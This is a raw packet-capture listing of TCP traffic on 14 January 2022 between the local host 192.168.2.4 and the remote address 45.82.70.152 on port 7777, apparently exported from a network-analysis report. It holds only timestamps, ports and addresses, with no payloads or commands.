                                                                                                                                  Jan 14, 2022 14:10:41.498563051 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498583078 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498590946 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498605967 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498625040 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498634100 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498646021 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498665094 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498673916 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498686075 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498704910 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498714924 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498724937 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498744965 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498754025 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498765945 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498785973 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498794079 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498806000 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498826027 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498836040 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498847008 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498866081 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498874903 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498886108 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498905897 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498917103 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498927116 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498946905 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.498958111 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.498984098 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.499008894 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.499015093 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.499033928 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.499058008 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.499064922 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.499083042 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.499106884 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.499114037 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.499131918 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.499155998 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.499161959 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.499181032 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.499205112 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.499212027 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.499231100 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.499254942 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.499263048 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.524715900 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.524774075 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.524790049 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.524817944 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.524856091 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.524862051 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.524904966 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.524940014 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.524945974 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525000095 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525038958 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.525043011 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525085926 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525126934 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.525126934 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525172949 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525207996 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.525214911 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525262117 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525296926 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.525304079 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525346994 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525386095 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.525388956 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525424004 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525461912 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.525464058 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525507927 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525544882 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.525552988 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525594950 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525635958 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.525638103 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525681019 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525717974 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.525722980 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525764942 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525803089 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.525806904 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525866032 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525903940 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.525916100 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525959015 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.525995970 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.526000977 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526042938 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526083946 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.526083946 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526127100 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526161909 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.526166916 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526207924 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526248932 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526257992 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.526290894 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526324987 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.526331902 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526375055 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526407957 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.526417017 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526458025 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526493073 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.526498079 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526540995 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526575089 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.526582003 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526623964 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526664019 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526664972 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.526706934 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526745081 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.526748896 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526791096 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526823044 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.526830912 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526871920 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526909113 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.526911974 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526953936 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.526988029 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.526993990 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527034998 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527071953 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.527075052 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527116060 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527156115 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527183056 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.527196884 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527235031 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.527237892 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527278900 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527319908 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.527321100 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527363062 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527400970 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.527405977 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527447939 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527488947 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527503967 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.527542114 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527580023 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.527581930 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527612925 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527652979 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527702093 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527741909 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527765036 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.527782917 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527791977 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.527820110 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.527825117 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527865887 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527903080 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.527905941 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527949095 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.527983904 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.527988911 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528029919 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528065920 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.528069973 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528111935 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528151989 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.528151989 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528194904 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528234005 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.528234959 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528275967 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528315067 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.528316021 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528358936 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528397083 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.528398991 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528440952 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528480053 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528490067 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.528523922 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528561115 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.528565884 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528606892 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528649092 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.528650045 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528692007 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528728962 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.528732061 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528774023 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528808117 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.528814077 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528855085 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528892040 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.528894901 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528937101 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.528973103 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.528976917 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.529019117 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.529052019 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.529059887 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.554604053 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.554658890 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.554668903 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.554721117 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.554759979 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.554788113 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.554857016 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.554894924 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.554910898 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.554960012 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.554995060 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.555010080 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.555059910 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.555107117 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.555109024 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.555159092 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.555193901 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.555207968 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.555258989 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.555295944 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.555311918 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.555361032 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.555397034 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.555409908 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.555459976 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.555500031 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.555509090 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.555561066 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.555597067 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.555610895 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.555660009 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.555696964 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.555708885 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.555758953 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.555794001 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.555807114 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.555855989 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.555891991 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.555905104 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.555954933 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.555989981 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.556003094 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.556051970 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.556087971 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.556099892 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.556150913 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.556188107 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.556200981 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.556265116 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.556309938 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.556313992 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.556364059 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.556404114 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.556413889 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.556463957 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.556507111 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.556514025 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.556565046 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.556607008 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.556627989 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.556699038 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.556737900 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.556756020 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.556809902 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.556849003 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.556859016 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.556929111 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.556973934 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.556997061 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.557065010 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.557109118 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.557141066 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.557210922 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.557250977 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.557277918 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.557327986 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.557377100 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.557403088 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.557426929 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.557463884 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.557507038 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.557559967 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.557583094 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.557607889 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.557629108 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.557655096 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.557661057 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.557709932 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.557758093 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.557775974 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.557810068 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.557847023 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.557885885 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.557934999 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.557979107 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.557986975 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.558034897 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.558068991 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.558084011 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.558132887 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.558168888 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.558182955 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.558232069 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.558269978 CET497787777192.168.2.445.82.70.152
